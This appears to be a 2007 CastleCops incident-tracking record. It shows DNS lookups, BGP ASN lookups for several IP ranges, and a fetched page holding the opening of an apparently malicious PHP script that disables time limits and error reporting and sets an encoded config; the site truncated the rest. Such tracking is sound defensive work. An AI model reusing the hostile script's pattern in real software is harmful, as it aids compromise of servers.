; <<>> DiG 9.3.4 <<>> blueline.be any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36307 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 1 ;; QUESTION SECTION: ;blueline.be. IN ANY ;; ANSWER SECTION: blueline.be. 3600 IN MX 10 mail.blueline.be. blueline.be. 3600 IN NS xeres.bluelinesoft.be. blueline.be. 3600 IN NS indra.blueline.be. ;; AUTHORITY SECTION: blueline.be. 3600 IN NS indra.blueline.be. blueline.be. 3600 IN NS xeres.bluelinesoft.be. ;; ADDITIONAL SECTION: mail.blueline.be. 3600 IN A 91.121.31.67 ;; Query time: 0 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Sun Dec 9 18:49:21 2007 ;; MSG SIZE rcvd: 147

---

dig any

at 09 Dec, 2007 @ 18:50:08
; <<>> DiG 9.3.4 <<>> dnip.net any ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35118 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 0 ;; QUESTION SECTION: ;dnip.net. IN ANY ;; ANSWER SECTION: dnip.net. 3600 IN A 222.122.132.211 dnip.net. 3600 IN NS ns.dnip.net. dnip.net. 3600 IN NS ns2.dnip.net. ;; AUTHORITY SECTION: dnip.net. 3600 IN NS ns.dnip.net. dnip.net. 3600 IN NS ns2.dnip.net. ;; Query time: 1 msec ;; SERVER: 204.152.184.68#53(204.152.184.68) ;; WHEN: Sun Dec 9 18:50:08 2007 ;; MSG SIZE rcvd: 105

---

host

at 08 Dec, 2007 @ 06:57:55

---

host

at 09 Dec, 2007 @ 18:45:07

---

host

at 09 Dec, 2007 @ 18:47:38

---

host

at 09 Dec, 2007 @ 18:48:36

---

host

at 09 Dec, 2007 @ 18:49:21

---

host

at 09 Dec, 2007 @ 18:50:08

---

host

at 09 Dec, 2007 @ 18:55:56

---

host

at 09 Dec, 2007 @ 18:56:54

---

host

at 09 Dec, 2007 @ 18:58:44

---

host

at 09 Dec, 2007 @ 18:59:05

---

host

at 09 Dec, 2007 @ 18:59:34

---

host

at 09 Dec, 2007 @ 19:00:08

---

host

at 09 Dec, 2007 @ 19:00:45

---

host

at 09 Dec, 2007 @ 19:01:21

---

host

at 09 Dec, 2007 @ 19:01:52

---

host

at 09 Dec, 2007 @ 19:02:27

---

fetched page

at 08 Dec, 2007 @ 06:57:50
MD5 Fingerprint: d646a4310ac0bcafbdc090e7d01ceaee
SHA1 Fingerprint: d8fc4c592d79a70f50207c34f6af15afd63d7be7
HTTP/1.1 200 OK Date: Sat, 08 Dec 2007 06:57:54 GMT Server: Apache Vary: Host Last-Modified: Sat, 08 Dec 2007 01:26:40 GMT ETag: "a77b02-4bb2-41465400" Accept-Ranges: bytes Content-Length: 19378 Content-Type: text/plain <? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0); error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==", "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N&quo TRUNCATED BY CASTLECOPS FOR PUBLIC DISPLAY -- CONTACT STAFF FOR DETAILS

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:45:19
AS | BGP Prefix | CC | Registry | Allocated
"8342 | 195.161.0.0/16 | RU | ripencc | 1997-06-05"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:45:27
AS Peers | BGP Prefix | CC | Registry | Allocated
"174 701 1239 1273 3356 10310 13237 | 195.161.0.0/16 | RU | ripencc | 1997-06-05"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 18:47:02
AS | CC | Registry | Allocated | AS Name
"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:56:28
AS | BGP Prefix | CC | Registry | Allocated
"4713 | 121.112.0.0/13 | JP | apnic | 2006-07-07"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:56:28
AS Peers | BGP Prefix | CC | Registry | Allocated
"2516 2914 | 121.112.0.0/13 | JP | apnic | 2006-07-07"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:57:24
AS | BGP Prefix | CC | Registry | Allocated
"10098 | 202.123.64.0/19 | HK | apnic | 2007-10-24" "10098 | 202.123.80.0/20 | HK | apnic | 2007-10-24"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:57:24
AS Peers | BGP Prefix | CC | Registry | Allocated
"2914 17888 | 202.123.80.0/20 | HK | apnic | 2007-10-24" "2914 17888 | 202.123.64.0/19 | HK | apnic | 2007-10-24"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 18:57:25
AS | CC | Registry | Allocated | AS Name
"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:58:44
AS | BGP Prefix | CC | Registry | Allocated
"3462 | 211.21.0.0/16 | TW | apnic | 2000-06-30"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:58:44
AS Peers | BGP Prefix | CC | Registry | Allocated
"2516 4134 4657 7473 9680 | 211.21.0.0/16 | TW | apnic | 2000-06-30"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 18:58:44
AS | CC | Registry | Allocated | AS Name
"4713 | JP | apnic | 1995-08-30 | OCN NTT Communications Corporation"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:59:05
AS | BGP Prefix | CC | Registry | Allocated
"3561 | 216.32.0.0/14 | US | arin | 1998-07-30"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:59:05
AS Peers | BGP Prefix | CC | Registry | Allocated
"174 209 701 1239 1299 2914 3257 3356 3549 4134 6453 7132 7473 | 216.32.0.0/14 | US | arin | 1998-07-30"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 18:59:05
AS | CC | Registry | Allocated | AS Name
"10098 | HK | apnic | 2007-10-24 | HENDERSON-HK Henderson Data Centre Limited"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 18:59:35
AS | BGP Prefix | CC | Registry | Allocated
"21844 | 67.18.0.0/15 | US | arin | 2004-03-15"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 18:59:35
AS Peers | BGP Prefix | CC | Registry | Allocated
"2914 3356 3549 3561 6461 7018 | 67.18.0.0/15 | US | arin | 2004-03-15"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 18:59:35
AS | CC | Registry | Allocated | AS Name
"3462 | TW | apnic | 2002-08-01 | HINET Data Communication Business Group"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 19:00:09
AS | BGP Prefix | CC | Registry | Allocated
"15703 | 80.247.192.0/19 | NL | ripencc | 2001-11-13"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 19:00:09
AS Peers | BGP Prefix | CC | Registry | Allocated
"3257 3549 6461 9009 10310 | 80.247.192.0/19 | NL | ripencc | 2001-11-13"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:00:10
AS | CC | Registry | Allocated | AS Name
"3561 | US | arin | 1998-10-07 | SAVVIS - Savvis"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 19:00:46
AS | BGP Prefix | CC | Registry | Allocated
"5617 | 80.48.0.0/13 | PL | ripencc | 2001-12-18"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 19:00:46
AS Peers | BGP Prefix | CC | Registry | Allocated
"5511 | 80.48.0.0/13 | PL | ripencc | 2001-12-18"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:00:46
AS | CC | Registry | Allocated | AS Name
"21844 | US | arin | 2001-06-29 | THEPLANET-AS - THE PLANET"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 19:01:21
AS | BGP Prefix | CC | Registry | Allocated
"16317 | 84.245.96.0/19 | SK | ripencc | 2005-03-16"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 19:01:21
AS Peers | BGP Prefix | CC | Registry | Allocated
"2607 5588 8928 | 84.245.96.0/19 | SK | ripencc | 2005-03-16"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:01:21
AS | CC | Registry | Allocated | AS Name
"15703 | NL | ripencc | 2000-09-19 | TRUESERVER-AS TrueServer BV AS number"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 19:01:53
AS | BGP Prefix | CC | Registry | Allocated
"35592 | 87.236.192.0/21 | CZ | ripencc | 2005-09-12"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 19:01:53
AS Peers | BGP Prefix | CC | Registry | Allocated
"8928 29113 | 87.236.192.0/21 | CZ | ripencc | 2005-09-12"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:01:53
AS | CC | Registry | Allocated | AS Name
"5617 | PL | ripencc | 1996-04-29 | TPNET Polish Telecom_s commercial IP network"

---

Corresponding BGP Origin ASN

at 09 Dec, 2007 @ 19:02:27
AS | BGP Prefix | CC | Registry | Allocated
"12322 | 88.160.0.0/11 | FR | ripencc | 2005-10-03"

---

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

at 09 Dec, 2007 @ 19:02:27
AS Peers | BGP Prefix | CC | Registry | Allocated
"174 2914 3356 3549 6453 6695 6762 7132 9009 10310 | 88.160.0.0/11 | FR | ripencc | 2005-10-03"

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:02:27
AS | CC | Registry | Allocated | AS Name
"16317 | SK | ripencc | 2001-02-23 | SK-4CALL 4CONSULT Ltd."

---

AS Description of a given BGP ASN

at 09 Dec, 2007 @ 19:02:52
AS | CC | Registry | Allocated | AS Name
"35592 | CZ | ripencc | 2005-09-13 | COOLHOUSING-AS COOLHOUSING Autonomous System"